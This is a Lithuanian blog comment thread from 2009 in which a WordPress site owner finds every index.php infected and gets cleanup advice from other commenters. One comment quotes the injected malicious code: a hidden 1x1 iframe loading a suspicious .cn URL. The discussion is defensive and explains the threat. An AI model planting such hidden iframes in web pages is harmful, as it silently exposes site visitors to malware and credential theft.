-
Julius J. 18:02 - 2009.01.8 | # |
Mano puslapis buvo nu’hack’ytas. Tai atradau visai netyčia. Bekėblinėjau po visus wp failus ir pastebėjau, kad index.php faile įterptas 1×1 pikselio rėmelis su nuoroda į kažkokį neaiškų puslapį. So what to do?
P.S. Slaptažodį jau pakeičiau. Naudoju NOD32 antivirusinę.
P.S.S. Ką tik buvo suvarytas ir temos index.php. Bet dabar pakeičiau visus slaptažodžius
-
Puslapiai
Naujienos-
Ką naršo
Blog at WordPress.com
Prologue tema iš Automattic
Karolis Pocius 18:14 - 2009.01.8 | #
Pranešk apie tai savo hostingo kompanijai. Problema gali būti ne tik tavo vieno puslapyje.
Aurimas [aurimas.eu] 18:14 - 2009.01.8 | #
geriausiai pasidaryk duomenų backup’ą, ir tiesiog išnaujo sukelk originalius (wordpress?) failus. Žmogus dirba arba a) turėdamas priėjimą prie tavo admin panelės, arba b) turėdamas priėjimą prie tavo hostingo.
Lapinas 18:21 - 2009.01.8 | #
Nežinau,
Bet įtariu, kad kaltas gali būti ne per seniausiai pagautas virusas kurį grįžęs iš mokyklos išvaliau. Dar turiu įtarimą, kad jis tik mano vieno ftp prisijungimo duomenis turi (-ėjo).
P.S. Siunčiuosi ugniasienę
Tomas Markauskas 19:34 - 2009.01.8 | #
Nei antivirusas nei ugniasienė nepadės. Problema juk serveryje, tad reik užlopyt skylę, kuri ten dar kogero vis dar egzistuoja. Keisk hostingo prisijungimo duomenis, iš naujo instaliuok wordpress’ą (nes kažkuris index.php failas gali būt ten užkrėstas, kurį užkrovus per naršyklę vėl užkrečiami index.php ir pan. Jis gali būt kur nors ir upload’ų kataloge. Ir aišku gali būti ir taip, kad skylė išvis ne tavo pusėje, o tiesiog serveryje kažkur…
Lapinas 19:42 - 2009.01.8 | #
Ne, skylė buvo mano pusėje, bet atsekiau Jo IP ir dabar rašau laišką pas jo interneto tiekėją. Jis net proxy serverio nenaudojo, o įterpęs buvo tik paprastą rėmelį. Bet patarimu vistiek pasinaudosiu. Perrašysiu wordpress. Ačiū
Tomas Markauskas 19:49 - 2009.01.8 | #
O iš kur žinai, kad ten tikrai jis ir kad ten tikrai jo IP adresas?
bfw 20:22 - 2009.01.8 | #
tai ne lapinas, tai seklys morka!
Lapinas 21:08 - 2009.01.8 | #
Tomai, aš nežinau ar tai tikrasis “hakeris”, bet atakas net ir į mano kompiuterį bei svetainę gavau iš jo.
Va koks kodas būdavo:
<iframe src=”http://litedownloadseek.cn/in.cgi?cocacola7″ width=1 height=1 style=”visibility: hidden”></iframe>
O siaube visi index failai užkrėsti :-(
Lapinas 22:22 - 2009.01.8 | #
Net į wp-admin/index.php įdėjo tą kodą. Gal kas nors žino plačiau apie tai?
Tomas Markauskas 22:37 - 2009.01.8 | #
O ko tau plačiau apie tai reikia?
Lapinas 23:33 - 2009.01.8 | #
Mane labiausiai domina ką toks kodas daro.
Tomas Markauskas 23:52 - 2009.01.8 | #
Daug ką gali daryti. Gali mėginti virusą pakišt, gali mėginti vogt slaptažodžius (buvo kažkas panašaus, net berods su firefoxu), gali šiaip mėgint užkraut kokį nors psl., kur tu galbūt būtum prisijungęs ir įvykdytum kažkokį veiksmą (kai svetainės leidžia vien URL parametrais pasiekti kritines funkcijas, kaip pvz. žinučių siuntimas, veiksmai su draugais, sąskaitų trynimas ir pan.).
Esmė, kad kažką mėgina daryt lankytojams nepastebint, o tai gali būti tau/lankytojui visiškai nekenksminga (tačiau kenksminga kam kitam) iki labai kenksminga (tiek tau tiek kam kitam).
Lapinas 14:39 - 2009.01.9 | #
Va šiandien sukėliau failus per naujo. Beje tau Tomai labai ačiū :-).
asdfwerwqe 19:18 - 2009.01.9 | #
Visai galimas daiktas, kad virusas pasiėmė tavo ftp kliento pass duombazę ir per ftp prisijungęs pridėliojo savo pėdsakų, kad kiti lankytojai irgi užsikrėtę savo ftp servuose prisidarytų visko ko nereikia. jei turi prisijungimų prie kitų serverių, ir ten pasižiūrėk, ar nėra to paties.
Lapinas 19:25 - 2009.01.9 | #
Ačiū Dievui neturiu :-)